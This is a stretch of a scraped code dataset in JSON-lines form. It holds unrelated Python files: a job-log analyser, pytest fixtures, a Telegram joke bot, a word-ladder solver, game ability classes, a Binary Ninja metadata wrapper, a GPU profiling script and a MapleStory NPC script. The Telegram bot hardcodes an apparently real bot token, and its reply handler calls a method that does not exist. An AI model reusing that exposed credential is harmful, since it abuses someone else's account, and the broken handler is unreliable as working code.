i.get(\"finished_at\")]) == len(job_infos)-len(dones)\n\n\n states = [{k:v for k,v in i.get(\"state\", {}).items() if v != \"unknown\"} if any(v for v in i.get(\"state\", {}).values() if v != \"unknown\") else {max(i.get(\"external_id\")): \"success\"} if i.get(\"finished_at\") else {} for i in job_infos]\n states = [(dict([max([(k, v) for k, v in i.items() if v == j], key=lambda x:x[0]) for j in set(i.values())]), dict(Counter(list(i.values())))) for i in states] #the highest ids per-state, number of states\n for state in states:\n if \"success\" in state[1] and len(state[0]) > 1:\n assert all(i > int({v: k for k, v in state[0].items()}[\"success\"]) for i in [int(k) for k,v in state[0].items() if v != \"success\"]), \"There is a succeeded task-id but it's not the last one!\"\n for single_state, infos in zip(states, job_infos):\n infos[\"single_state\"] = single_state\n\n for show in [j for j in [\"running\", \"enqueued\", \"failed\", \"success\"] if j in set(flatten([i[1].keys() for i in states]))]:\n toshow = [i for i in job_infos if show in i[\"single_state\"][0].values()]\n if toshow:\n print(\"The following runs are \"+show+\":\")\n print(\"\\n\".join([f\" {r['output'].ljust(max(len(i['output']) for i in toshow))} (pid {','.join(r['external_id'])})\" for r in toshow]))\n job_infos = [i for i in job_infos if not show in i[\"single_state\"][0].values()]\n\n return\n\n # if (enqueueds := [i for i in job_infos if all(j == \"enqueued\" for j in i.get(\"state\", [\"not_enqueued\"]))]):\n # print(\"The following runs are enqueued:\\n \"+\"\\n \".join([f\" {r['output'].ljust(max(len(i['output']) for i in enqueueds))} (pid {','.join(r['external_id'])})\" for r in enqueueds]))\n # job_infos = [i for i in job_infos if i[\"jobid\"] not in [i[\"jobid\"] for i in enqueueds]]\n # if (runnings := [i for i in job_infos if all(j == \"running\" for j in i.get(\"state\", [\"not_running\"]))]):\n # print(\"The following runs are running:\\n \"+\"\\n \".join([f\" {r['output'].ljust(max(len(i['output']) for i in runnings))} (pid {','.join(r['external_id'])})\" for r in runnings]))\n # job_infos = [i for i in job_infos if i[\"jobid\"] not in [i[\"jobid\"] for i in runnings]]\n # #TODO finished ones are not actually finished god damn it\n # if (dones := [i for i in job_infos if \"finished_at\" in i or all(j == \"success\" for j in i.get(\"state\"))]):\n # print(\"The following ones are finished: \\n \" + \"\\n \".join([f\"{i['output'].ljust(max(len(j['output']) for j in dones))}(pid {','.join(i['external_id'])}){(' at '+str(i['finished_at'])) if 'finished_at' in i else ''}\" for i in dones]))\n # job_infos = [i for i in job_infos if i[\"jobid\"] not in [i[\"jobid\"] for i in dones]]\n # #TODO there's also enqueued!\n # if (fails := sorted([i for i in job_infos if not i.get(\"finished_at\")], key=lambda x: x[\"output\"])):\n # interrupteds = []\n # print(\"The following ones failed:\")\n # for fail in fails:\n # if not args.include_errors:\n # print(f\" {fail['output'].ljust(max(len(i['output']) for i in fails))} (pid {','.join(fail['external_id'])})\")\n # else:\n # try:\n # err, kind = extract_error(read_errorfile(fail[\"errorfile\"]))\n # except FileNotFoundError:\n # err, kind = \"\", \"\"\n # if kind == \"Exception\":\n # print(f\" {fail['output'].ljust(max(len(i['output']) for i in fails))} (pid {','.join(fail['external_id'])})\")\n # print(\" \" + err.replace(\"\\n\", \"\\n \"))\n # elif kind.startswith(\"SystemExit\") or kind == \"Interrupted\":\n # interrupteds.append((fail, err, kind))\n # else:\n # print(f\" {fail['output'].ljust(max(len(i['output']) for i in fails))} (pid {','.join(fail['external_id'])})\")\n # print(\" \"+\"Error unknown\")\n # if interrupteds:\n # print(\"The following ones were interrupted:\")\n # for j in interrupteds:\n # print(f\" {j[0]['output'].ljust(max(len(i[0]['output']) for i in interrupteds))} (pid {','.join(j[0]['external_id'])})\")\n # #TODO cross-check with `check -j` command\n # #TODO parse the leftover_text as well, there may be more info about fails\n # #TODO use the error-files to get the respective errors of the files\n # #TODO cross-check with todo_jobs OR manually run `snakemake --dry-run --ignore-all-existing-files` to make a tree (like pstree) of which branches worked an which ones didn't\n # # see https://www.willmcgugan.com/blog/tech/post/rich-tree/\n\n\n# TODO actually use this\ndef read_allrulesfile():\n apply_dotenv_vars()\n with open(abspath(join(dirname(util.__file__), \"..\", \"..\", \"Snakefile\"))) as rfile:\n snakefile_cont = rfile.read()\n last_rule = snakefile_cont[snakefile_cont.find(\"LAST_RULE\"):].split('\"')[1]\n with open(\"all_rules.txt\", \"r\") as rfile:\n txt = rfile.read()\n todo_jobs, _, job_infos, _ = split_all([txt])\n todo_jobs = todo_jobs[0]\n lastrules = [i for i in job_infos if i[\"rule\"] == last_rule]\n dones = [i for i in lastrules if isfile(join(os.environ[\"MA_BASE_DIR\"], i[\"output\"]))]\n wildcards = [dict([j.split(\"=\") for j in i[\"wildcards\"].split(\", \")]) for i in dones]\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"cstenkamp/derive_conceptualspaces","sub_path":"workflow/sge/util/analyze_log.py","file_name":"analyze_log.py","file_ext":"py","file_size_in_byte":15206,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"26414590190","text":"import pytest\nimport os\n\ndir_list = {\n \"contents\": [\n {\n \"type\": \"directory\",\n \"name\": \"FY20\",\n \"contents\": [\n {\n \"type\": \"file\",\n \"name\": \"letterofresignation_2020_10_04.docx\"\n },\n {\n \"type\": \"file\",\n \"name\": \"letterofresignation_2020_10_31.docx\"\n }\n ]\n },\n {\n \"type\": \"file\",\n \"name\": \"README.txt\"\n }\n ]\n }\n\nother_dir_list = {\n \"contents\": [\n {\n \"type\": \"directory\",\n \"name\": \"FY21\",\n \"contents\": [\n {\n \"type\": \"file\",\n \"name\": \"dontquityet_2020_10_04.docx\"\n },\n {\n \"type\": \"file\",\n \"name\": \"dontquityet_2020_10_31.docx\"\n }\n ]\n },\n {\n \"type\": \"file\",\n \"name\": \"README.txt\"\n }\n ]\n }\n\n\n@pytest.mark.parametrize('dir_list', [dir_list, other_dir_list])\ndef test_fixture(testing_directory):\n print([f for f in os.walk(testing_directory)])","repo_name":"chrispcharlton/trufflepig","sub_path":"test/test_fixtures.py","file_name":"test_fixtures.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"15334480189","text":"\r\nfrom aiogram import Bot,Dispatcher,executor,types\r\nfrom aiogram.types import ReplyKeyboardMarkup, ReplyKeyboardRemove,KeyboardButton\r\nbot=Bot(token=\"6093366391:AAGfDvAcI7iTVpVsoFexDIOCn4h20kQ1V-A\")\r\ndp=Dispatcher(bot)\r\n\r\nbutton1=KeyboardButton('stupid')\r\nbutton2=KeyboardButton('fat')\r\nbutton3=KeyboardButton('dumb')\r\nkeyboard1=ReplyKeyboardMarkup(resize_keyboard=True, one_time_keyboard=True).add(button1).add(button2).add(button3)\r\n\r\n@dp.message_handler()\r\nasync def kb_answer(message: types.Message):\r\n jokes = {\r\n 'stupid': [\"\"\"Yo' Mama is so stupid, she needs a recipe to make ice cubes.\"\"\",\r\n \"\"\"Yo' Mama is so stupid, she thinks DNA is the National Dyslexics Association.\"\"\"],\r\n 'fat': [\"\"\"Yo' Mama is so fat, when she goes to a restaurant, instead of a menu, she gets an estimate.\"\"\",\r\n \"\"\" Yo' Mama is so fat, when the cops see her on a street corner, they yell, \"Hey you guys, break it up!\" \"\"\"],\r\n 'dumb': [\"\"\"Yo' Mama is so dumb, when God was giving out brains, she thought they were milkshakes and asked for extra thick.\"\"\",\r\n \"\"\"Yo' Mama is so dumb, she locked her keys inside her motorcycle.\"\"\"] \r\n } \r\n if message.text == 'stupid':\r\n await message.random.choice(jokes['stupid'])\r\n elif message.text == 'fat':\r\n await message.random.choice(jokes['fat'])\r\n elif message.text == 'dumb':\r\n await message.random.choice(jokes['dumb'])\r\n \r\n\r\n\r\n\r\nexecutor.start_polling(dp)\r\n \r\n \r\n","repo_name":"nilabha2001/impressAi-exam","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3015786678","text":"def solution(begin, target, words):\n if target not in set(words):\n return 0\n \n conver = {}\n for a in words:\n conver.setdefault(a, [])\n for b in words:\n if convertible(a, b):\n conver[a].append(b)\n stack = [word for word in words if convertible(begin, word)]\n path = []\n answer = 100\n while stack:\n now = stack.pop()\n if now == target:\n answer = len(path)\n elif len(path) >= answer:\n path.pop()\n else:\n path.append(now)\n stack += [k for k in conver[now] if k not in path]\n if answer == 100:\n answer = 0\n return answer \n\ndef convertible(a, b):\n if sum([a_ != b_ for a_, b_ in zip(a, b)]) == 1:\n return True\n else:\n return False\n","repo_name":"hongminpark/prgrms-algorithms","sub_path":"search_dfs_bfs/lv3_단어변환.py","file_name":"lv3_단어변환.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"69851026972","text":"import json, pygame\nimport enemies as E\nimport render\nfrom render import width, height\nfrom math import degrees, radians\nfrom movement import get_deg_direction\nfrom main import calculate_damage_mod\nfrom animations import Animation\n\n\nclass Special:\n\tdef __init__(self, position, speed, direction, surface, damage=0, lifetime=0):\n\t\tself.position = position\n\t\tself.surf = surface\n\t\tself.lifetime = lifetime\n\t\tself.speed = speed\n\t\tself.direction = direction\n\t\tself.rect = pygame.Rect(self.position, (self.surf.get_width(), self.surf.get_height()))\n\t\tself.damage = damage\n\n\t\tif self.direction[0] == 0 and self.direction[1] == 0:\n\t\t\tself.direction[1] = 1\n\n\t\tself.counter = 0\n\n\n\nwith open(\"data/specials.json\") as file:\n\tspecials = json.load(file)\n\n\ndef get_special(champ_name):\n\tif champ_name == \"Knight\":\n\t\treturn Judgement\n\telif champ_name == \"Mage\":\n\t\treturn ArcaneBarrage\n\telif champ_name == \"Juggernaut\":\n\t\treturn Retaliate\n\telif champ_name == \"Assassin\":\n\t\treturn Backstab\n\telif champ_name == \"Tank\":\n\t\treturn Fortify\n\ndef get_passive(champ_name):\n\tif champ_name == \"Juggernaut\":\n\t\treturn None\n\telse:\n\t\treturn None\n\nclass Judgement(Special):\n\tid = 0\n\tname = \"Judgement\"\n\tdescription = \"The god of the kingdom is called upon, smiting the enemy.\"\n\teffect = \"If the enemy is below 10% + (caster.attack / 2) health, they are executed and the cost is refunded. Else, this attack deals 1.5x basic attack damage.\"\n\n\tdef __init__(self, caster):\n\t\tif caster.charge == 100:\n\t\t\tfor i in caster.enemies:\n\t\t\t\tif (abs(i.rect.center[0] - caster.rect.center[0]) < 200) and (abs(i.rect.center[1] - caster.rect.center[1] < 200)):\n\t\t\t\t\tenemy = i\n\t\t\t\t\tprint(((enemy.max_health / 10) + caster.attack * caster.attack_mod / 2 ))\n\t\t\t\t\tif enemy.health < (enemy.max_health / 10) + caster.attack * caster.attack_mod / 2:\n\t\t\t\t\t\tenemy.health = 0\n\t\t\t\t\telse:\n\t\t\t\t\t\tcaster.charge = 0\n\t\t\t\t\t\tenemy.health -= caster.attack * caster.attack_mod * calculate_damage_mod(self, enemy, \"armour\")\n\t\t\t\telse:\n\t\t\t\t\tprint(\"No one close enough!\")\n\n\t\telse:\n\t\t\tprint(\"Not enough charge!\")\n\n\nclass ArcaneBarrage(Special):\n\tid = 1\n\tname = \"Arcane Barrage\"\n\tdescription = \"An unstoppable barrage of pure magic is hurled at the enemy.\"\n\teffect = \"Deals 1.5x the caster's magic, and buffs all the caster's magic attacks from now.\"\n\tspeed = 50\n\tsurf = pygame.Surface((120, 120))\n\tsurf.fill((0, 183, 255))\n\n\tdef __init__(self, caster):\n\t\tif caster.charge > 20:\n\t\t\tcaster.magic_mod += 0.1\n\t\t\tcaster.charge -= 20\n\t\t\tdamage = caster.magic * 1.5 * caster.magic_mod\n\t\t\tsuper().__init__((caster.position[:]), ArcaneBarrage.speed, caster.direction[:], ArcaneBarrage.surf, damage=damage,lifetime=3)\n\t\t\tself.hit = []\n\t\t\tself.target = caster.mousepos\n\t\t\tself.direction = get_deg_direction(self.rect.center, self.target)\n\t\t\tcaster.entities.append(self)\n\t\telse:\n\t\t\tprint(\"Not enough charge!\")\n\n\n\tdef update(self, dt, enemies):\n\t\tspeed = self.speed * dt / 60\n\t\t\n\t\tself.position[0] += self.direction[0] * speed\n\t\tself.position[1] += self.direction[1] * speed\n\t\tself.rect.top = self.position[1]\n\t\tself.rect.left = self.position[0]\n\n\t\tfor e in enemies:\n\t\t\tif not (e in self.hit):\n\t\t\t\tif e.rect.colliderect(self.rect):\n\t\t\t\t\tprint(e.position, self.position)\n\t\t\t\t\tself.hit.append(e)\n\t\t\t\t\te.health -= self.damage * calculate_damage_mod(self, e, \"magic\")\n\t\t\t\t\tif e.health < 0:\n\t\t\t\t\t\te.health = 0\n\nclass Retaliate(Special):\n\tid = 2\n\tname = \"Retaliate\"\n\tdescription = \"Juggernaut throws out a massive punch in a circle that deals more damage the more he's been hurt.\"\n\teffect = \"Deals 30 damage per 10% missing caster health + caster's attack.\"\n\n\tdef __init__(self, caster):\n\t\ttenpercent = caster.max_health / 10\n\t\tnum = 0\n\t\twhile tenpercent < caster.max_health:\n\t\t\tnum += 1\n\t\t\ttenpercent += caster.max_health / 10\n\n\t\tdamage = caster.attack * caster.attack_mod + (30 * num)\n\t\tself.rect = pygame.Rect((0,0), (250, 250))\n\t\tself.rect.center = caster.rect.center\n\n\t\tif caster.charge == 100:\n\t\t\tfor i in caster.enemies:\n\t\t\t\tif i.rect.colliderect(self.rect):\n\n\t\t\t\t\tcolors = [(226,34,76), (226,88,34), (226,184,34)]\t\t\n\t\t\t\t\ta = Animation(colors, 1, (self.rect.left, self.rect.top), (self.rect.width, self.rect.height), \"special\")\n\t\t\t\t\tcaster.animations.append(a)\n\t\t\t\t\tenemy = i\n\t\t\t\t\tdamage *= calculate_damage_mod(self, enemy, \"armour\")\n\t\t\t\t\tenemy.health -= damage\n\t\t\t\t\tprint(damage)\n\t\t\t\t\tcaster.charge = 0\n\t\t\t\telse:\n\t\t\t\t\tprint(\"No one close enough!\")\n\n\t\telse:\n\t\t\tprint(\"Not enough charge!\")\n\nclass Backstab:\n\tid = 3\n\tname = \"Backstab\"\n\tdescription = \"The Assassin runs behind the enemy, dealing massive damage with their dagger.\"\n\teffect = \"Deals 3x the attackers attack, and causes the enemy to have a 50% chance to miss next attack.\"\n\n\tdef use(caster, enemy):\n\t\tdamage = caster.attack * 3\n\t\tcaster.evasion = 0.5\n\t\tenemy.health -= damage\n\nclass Fortify:\n\tid = 4\n\tname = \"Fortify\"\n\tdescription = \"The Tank braces for impact, raising their defence to unparalleled levels.\"\n\teffect = \"For the next 2 turns, resistence is 3x, enemy attacks have 10% chance to ricochet off.\"\n\n\tdef use(caster, enemy):\n\t\tcaster.armour_mod = 3\n\t\tcaster.magic_resist_mod = 3\n\t\tcaster.ricochet_chance = 0.1\n","repo_name":"EdrinBatachu/Project-L","sub_path":"specials.py","file_name":"specials.py","file_ext":"py","file_size_in_byte":5096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31300660365","text":"import ctypes\n\n# Binary Ninja components\nimport _binaryninjacore as core\nfrom enums import MetadataType\n\n\nclass Metadata(object):\n\tdef __init__(self, value=None, signed=None, raw=None, handle=None):\n\t\tif handle is not None:\n\t\t\tself.handle = handle\n\t\telif isinstance(value, int):\n\t\t\tif signed:\n\t\t\t\tself.handle = core.BNCreateMetadataSignedIntegerData(value)\n\t\t\telse:\n\t\t\t\tself.handle = core.BNCreateMetadataUnsignedIntegerData(value)\n\t\telif isinstance(value, bool):\n\t\t\tself.handle = core.BNCreateMetadataBooleanData(value)\n\t\telif isinstance(value, str):\n\t\t\tif raw:\n\t\t\t\tbuffer = (ctypes.c_ubyte * len(value)).from_buffer_copy(value)\n\t\t\t\tself.handle = core.BNCreateMetadataRawData(buffer, len(value))\n\t\t\telse:\n\t\t\t\tself.handle = core.BNCreateMetadataStringData(value)\n\t\telif isinstance(value, float):\n\t\t\tself.handle = core.BNCreateMetadataDoubleData(value)\n\t\telif isinstance(value, list):\n\t\t\tself.handle = core.BNCreateMetadataOfType(MetadataType.ArrayDataType)\n\t\t\tfor elm in value:\n\t\t\t\tmd = Metadata(elm, signed, raw)\n\t\t\t\tcore.BNMetadataArrayAppend(self.handle, md.handle)\n\t\telif isinstance(value, dict):\n\t\t\tself.handle = core.BNCreateMetadataOfType(MetadataType.KeyValueDataType)\n\t\t\tfor elm in value:\n\t\t\t\tmd = Metadata(value[elm], signed, raw)\n\t\t\t\tcore.BNMetadataSetValueForKey(self.handle, str(elm), md.handle)\n\t\telse:\n\t\t\traise ValueError(\"List doesn't not contain type of: int, bool, str, float, list, dict\")\n\n\t@property\n\tdef value(self):\n\t\tif self.is_integer:\n\t\t\treturn int(self)\n\t\telif self.is_string or self.is_raw:\n\t\t\treturn str(self)\n\t\telif self.is_float:\n\t\t\treturn float(self)\n\t\telif self.is_boolean:\n\t\t\treturn bool(self)\n\t\telif self.is_array:\n\t\t\treturn list(self)\n\t\telif self.is_dict:\n\t\t\treturn self.get_dict()\n\t\traise TypeError()\n\n\tdef get_dict(self):\n\t\tif not self.is_dict:\n\t\t\traise TypeError()\n\t\tresult = {}\n\t\tfor key in self:\n\t\t\tresult[key] = self[key]\n\t\treturn result\n\n\t@property\n\tdef type(self):\n\t\treturn MetadataType(core.BNMetadataGetType(self.handle))\n\n\t@property\n\tdef is_integer(self):\n\t\treturn self.is_signed_integer or self.is_unsigned_integer\n\n\t@property\n\tdef is_signed_integer(self):\n\t\treturn core.BNMetadataIsSignedInteger(self.handle)\n\n\t@property\n\tdef is_unsigned_integer(self):\n\t\treturn core.BNMetadataIsUnsignedInteger(self.handle)\n\n\t@property\n\tdef is_float(self):\n\t\treturn core.BNMetadataIsDouble(self.handle)\n\n\t@property\n\tdef is_boolean(self):\n\t\treturn core.BNMetadataIsBoolean(self.handle)\n\n\t@property\n\tdef is_string(self):\n\t\treturn core.BNMetadataIsString(self.handle)\n\n\t@property\n\tdef is_raw(self):\n\t\treturn core.BNMetadataIsRaw(self.handle)\n\n\t@property\n\tdef is_array(self):\n\t\treturn core.BNMetadataIsArray(self.handle)\n\n\t@property\n\tdef is_dict(self):\n\t\treturn core.BNMetadataIsKeyValueStore(self.handle)\n\n\tdef remove(self, key_or_index):\n\t\tif isinstance(key_or_index, str) and self.is_dict:\n\t\t\tcore.BNMetadataRemoveKey(self.handle, key_or_index)\n\t\telif isinstance(key_or_index, int) and self.is_array:\n\t\t\tcore.BNMetadataRemoveIndex(self.handle, key_or_index)\n\t\telse:\n\t\t\traise TypeError(\"remove only valid for dict and array objects\")\n\n\tdef __len__(self):\n\t\tif self.is_array or self.is_dict or self.is_string or self.is_raw:\n\t\t\treturn core.BNMetadataSize(self.handle)\n\t\traise Exception(\"Metadata object doesn't support len()\")\n\n\tdef __iter__(self):\n\t\tif self.is_array:\n\t\t\tfor i in xrange(core.BNMetadataSize(self.handle)):\n\t\t\t\tyield Metadata(handle=core.BNMetadataGetForIndex(self.handle, i)).value\n\t\telif self.is_dict:\n\t\t\tresult = core.BNMetadataGetValueStore(self.handle)\n\t\t\ttry:\n\t\t\t\tfor i in xrange(result.contents.size):\n\t\t\t\t\tyield result.contents.keys[i]\n\t\t\tfinally:\n\t\t\t\tcore.BNFreeMetadataValueStore(result)\n\t\telse:\n\t\t\traise Exception(\"Metadata object doesn't support iteration\")\n\n\tdef __getitem__(self, value):\n\t\tif self.is_array:\n\t\t\tif not isinstance(value, int):\n\t\t\t\traise ValueError(\"Metadata object only supports integers for indexing\")\n\t\t\tif value >= len(self):\n\t\t\t\traise IndexError(\"Index value out of range\")\n\t\t\treturn Metadata(handle=core.BNMetadataGetForIndex(self.handle, value)).value\n\t\tif self.is_dict:\n\t\t\tif not isinstance(value, str):\n\t\t\t\traise ValueError(\"Metadata object only supports strings for indexing\")\n\t\t\thandle = core.BNMetadataGetForKey(self.handle, value)\n\t\t\tif handle is None:\n\t\t\t\traise KeyError(value)\n\t\t\treturn Metadata(handle=handle).value\n\n\t\traise NotImplementedError(\"Metadata object doesn't support indexing\")\n\n\tdef __str__(self):\n\t\tif self.is_string:\n\t\t\treturn core.BNMetadataGetString(self.handle)\n\t\tif self.is_raw:\n\t\t\tlength = ctypes.c_ulonglong()\n\t\t\tlength.value = 0\n\t\t\tnative_list = core.BNMetadataGetRaw(self.handle, ctypes.byref(length))\n\t\t\tout_list = []\n\t\t\tfor i in xrange(length.value):\n\t\t\t\tout_list.append(native_list[i])\n\t\t\tcore.BNFreeMetadataRaw(native_list)\n\t\t\treturn ''.join(chr(a) for a in out_list)\n\n\t\traise ValueError(\"Metadata object not a string or raw type\")\n\n\tdef __int__(self):\n\t\tif self.is_signed_integer:\n\t\t\treturn core.BNMetadataGetSignedInteger(self.handle)\n\t\tif self.is_unsigned_integer:\n\t\t\treturn core.BNMetadataGetUnsignedInteger(self.handle)\n\n\t\traise ValueError(\"Metadata object not of integer type\")\n\n\tdef __float__(self):\n\t\tif not self.is_float:\n\t\t\traise ValueError(\"Metadata object is not float type\")\n\t\treturn core.BNMetadataGetDouble(self.handle)\n\n\tdef __nonzero__(self):\n\t\tif not self.is_boolean:\n\t\t\traise ValueError(\"Metadata object is not boolean type\")\n\t\treturn core.BNMetadataGetBoolean(self.handle)\n\n\tdef __eq__(self, other):\n\t\tif isinstance(other, int) and self.is_integer:\n\t\t\treturn int(self) == other\n\t\telif isinstance(other, str) and (self.is_string or self.is_raw):\n\t\t\treturn str(self) == other\n\t\telif isinstance(other, float) and self.is_float:\n\t\t\treturn float(self) == other\n\t\telif isinstance(other, bool) and self.is_boolean:\n\t\t\treturn bool(self) == other\n\t\telif self.is_array and ((isinstance(other, Metadata) and other.is_array) or isinstance(other, list)):\n\t\t\tif len(self) != len(other):\n\t\t\t\treturn False\n\t\t\tfor a, b in zip(self, other):\n\t\t\t\tif a != b:\n\t\t\t\t\treturn False\n\t\t\treturn True\n\t\telif self.is_dict and ((isinstance(other, Metadata) and other.is_dict) or isinstance(other, dict)):\n\t\t\tif len(self) != len(other):\n\t\t\t\treturn False\n\t\t\tfor a, b in zip(self, other):\n\t\t\t\tif a != b or self[a] != other[b]:\n\t\t\t\t\treturn False\n\t\t\treturn True\n\t\telif isinstance(other, Metadata) and self.is_integer and other.is_integer:\n\t\t\treturn int(self) == int(other)\n\t\telif isinstance(other, Metadata) and (self.is_string or self.is_raw) and (other.is_string or other.is_raw):\n\t\t\treturn str(self) == str(other)\n\t\telif isinstance(other, Metadata) and self.is_float and other.is_float:\n\t\t\treturn float(self) == float(other)\n\t\telif isinstance(other, Metadata) and self.is_boolean and other.is_boolean:\n\t\t\treturn bool(self) == bool(other)\n\t\traise NotImplementedError()\n\n\tdef __ne__(self, other):\n\t\tif isinstance(other, int) and self.is_integer:\n\t\t\treturn int(self) != other\n\t\telif isinstance(other, str) and (self.is_string or self.is_raw):\n\t\t\treturn str(self) != other\n\t\telif isinstance(other, float) and self.is_float:\n\t\t\treturn float(self) != other\n\t\telif isinstance(other, bool):\n\t\t\treturn bool(self) != other\n\t\telif self.is_array and ((isinstance(other, Metadata) and other.is_array) or isinstance(other, list)):\n\t\t\tif len(self) != len(other):\n\t\t\t\treturn True\n\t\t\tareEqual = True\n\t\t\tfor a, b in zip(self, other):\n\t\t\t\tif a != b:\n\t\t\t\t\tareEqual = False\n\t\t\treturn not areEqual\n\t\telif self.is_dict and ((isinstance(other, Metadata) and other.is_dict) or isinstance(other, dict)):\n\t\t\tif len(self) != len(other):\n\t\t\t\treturn True\n\t\t\tfor a, b in zip(self, other):\n\t\t\t\tif a != b or self[a] != other[b]:\n\t\t\t\t\treturn True\n\t\t\treturn False\n\t\telif isinstance(other, Metadata) and self.is_integer and other.is_integer:\n\t\t\treturn int(self) != int(other)\n\t\telif isinstance(other, Metadata) and (self.is_string or self.is_raw) and (other.is_string or other.is_raw):\n\t\t\treturn str(self) != str(other)\n\t\telif isinstance(other, Metadata) and self.is_float and other.is_float:\n\t\t\treturn float(self) != float(other)\n\t\telif isinstance(other, Metadata) and self.is_boolean and other.is_boolean:\n\t\t\treturn bool(self) != bool(other)\n","repo_name":"naveenselvan/Reversing-Tools","sub_path":"tools/binaryninja/python/binaryninja/metadata.py","file_name":"metadata.py","file_ext":"py","file_size_in_byte":8109,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"28577054294","text":"#!/usr/bin/env python3\n\nimport subprocess\nimport csv\nimport sys\n\nresult = subprocess.run([\"nvprof\", \"--print-gpu-trace\", \"--csv\", sys.argv[1]], stderr=subprocess.PIPE, stdout=subprocess.PIPE)\n\n\nlines = result.stdout.split(b'\\n')\n# print(b'\\n\\n---\\n\\n'.join(lines).decode())\n\nfor i, l in enumerate(lines):\n if l.startswith(b','):\n tiramisu_exec_times = [float(num.decode()) for num in lines[i].split(b',')[1:]]\n halide_exec_times = [float(num.decode()) for num in lines[i+1].split(b',')[1:]]\n lines = lines[:i] + lines[i + 2:]\n break\n\nprint(b'\\n'.join(lines).decode())\n\nlines = result.stderr.split(b'\\n') \n\n\nfor i, line in enumerate(lines):\n if line.endswith(b'Profiling result:'):\n start_index = i + 1\n break\n\nreader = csv.DictReader(l.decode() for l in lines[start_index: -1])\nrows = [row for row in reader]\nunits = rows[0]\nrows = rows[1:]\n\nnb_tests = len(tiramisu_exec_times) + 1\n\nassert(len(rows) % nb_tests == 0)\n\ndef check_equal(rows, start1, start2, length):\n for i in range(length):\n if rows[start1 + i][\"Name\"] != rows[start2 + i][\"Name\"]:\n return False\n return True\n\nfor i in range(1, len(rows)//nb_tests):\n a_len = i\n b_len = len(rows)//nb_tests - a_len\n # heuristic check\n if (all(check_equal(rows, 0, j * a_len + b_len, a_len) for j in range(1, nb_tests)) and\n all(check_equal(rows, a_len, nb_tests * a_len + j * b_len, b_len) for j in range(1, nb_tests))):\n break\n\ndef median(exec_times, rows, start, length):\n sorted_indices = sorted(list(range(len(exec_times))), key=lambda i: exec_times[i])\n\n # print(sorted_indices)\n \n nb = len(exec_times)\n result = []\n first, second = sorted_indices[(nb - 1) // 2], sorted_indices[nb // 2]\n result.append(('Exec Time', (exec_times[first] + exec_times[second]) / 2))\n\n for (row1, row2) in zip(rows[start + length * first: start + length * (first + 1)], rows[start + length * second: start + length * (second + 1)]):\n result.append((row1['Name'], (float(row1['Duration']) + float(row2['Duration'])) / 2))\n total_copy = 0.0\n total_kernel = 0.0\n for label, number in result[1:]:\n if label.startswith('[CUDA memcpy'):\n total_copy += number\n else:\n total_kernel += number\n result.append(('Total Copy', total_copy))\n result.append(('Total Kernel', total_kernel))\n return result\n\ndef print_result(result):\n for label, number in result:\n print(\"{:40} {}\".format(label[:37], number))\n\n# print([row['Name'] for row in rows[:a_len]])\n# print([row['Name'] for row in rows[a_len: a_len + b_len]])\n\nprint('== tiramisu ==')\nprint_result(median(tiramisu_exec_times, rows, a_len + b_len, a_len))\nprint('== halide ==')\nprint_result(median(halide_exec_times, rows, nb_tests * a_len + b_len, b_len))\n\n# print(len(rows))\n# print(rows[0])\n# print(rows[-1])\n\n","repo_name":"Tiramisu-Compiler/tiramisu","sub_path":"utils/run_gpu_bench.py","file_name":"run_gpu_bench.py","file_ext":"py","file_size_in_byte":2895,"program_lang":"python","lang":"en","doc_type":"code","stars":876,"dataset":"github-code","pt":"32"} +{"seq_id":"28284438692","text":"# Character field ID when accessed: 100000104\n# ObjectID: 1000001\n# ParentID: 1012104\n# Object Position Y: 132\n# Object Position X: -151\n#henesys hair salon - Brittany\n\n#Eye selection:\n#20044 -bright eyes (my favorite)\n#20037 - evan eyes\n#20040 - Piercing gaze\noptions = []\n\nal = chr.getAvatarData().getAvatarLook()\n# faceColour = al.getFace() % 10 # - maybe relevant to hair but in hair it's switch up the eye's you can see\nfaceColour = 0\nif al.getGender() == 0: # Male\n #options = [20000, 20001, 20002, 20003, 20004, 20005, 20006, 20007, 20044, 20045, 20046, 20047, 20048, 20049, 20050, 20051, 20052, 20053, 20054, 20055, 20056]\n options = [20044,20000, 20001, 20002, 20003, 20004, 20005, 20006, 20007, 20008, 20009, 20010, 20011, 20012, 20013, 20014, 20015, 20016, 20017, 20018, 20019, 20020, 20021, 20022, 20023, 20024, 20025, 20026, 20027, 20028, 20029, 20030, 20031, 20032, 20036, 20037, 20040, 20043, 20047, 20050, 20051, 20056]\nelse: # Female\n options = [20044] # sorry ladies, i care about the boys only\n\noptions = list(map(lambda x: x + faceColour, options))\nanswer = sm.sendAskAvatar(\"Choose your new eyes!\", False, False, options)\n\n# #hair colors change for the hair!\n# eyes_Color = []\n# for i in range(5):\n# eyes_Color.append(options[answer] + i)\n#\n# options2 = list(map(lambda x: x + 0, eyes_Color))\n# answer2 = sm.sendAskAvatar(\"Choose your new color\", False, False, options2)\n#\n# if answer2 < len(options2):\n# sm.changeCharacterLook(options2[answer2])\n\nmesos = chr.getLevel() * 20000 # Taking my lvl and multiply it by 20,000 | for example lvl200 * 20,000 = 4,000,000\n\n# ----------------------------------------------------------------------------------------------------------------------\n# getting my char meso amount (Int)-\ncharMoney = chr.getMoney()\nchrDisplay = \"\" # the amount of meso the character have\ncounter = 0 # will count 3 figures for the ','\n# I created a while that going to move through the meso the char have and every 3 num's from the lowest num it's going to add \",\" and will also check it's isn\"t the first num (highest in the num)\nwhile charMoney > 0:\n counter +=1\n chrDisplay = str(charMoney % 10) + str(chrDisplay)\n\n if counter == 3:\n if (charMoney / 10) > 0:\n chrDisplay = \",\" + str(chrDisplay)\n counter = 0\n\n charMoney = (charMoney / 10)\n\n# I created a while that going to move through the meso the char have and every 3 num's from the lowest num it's going to add \",\" and will also check it's isn\"t the first num (highest in the 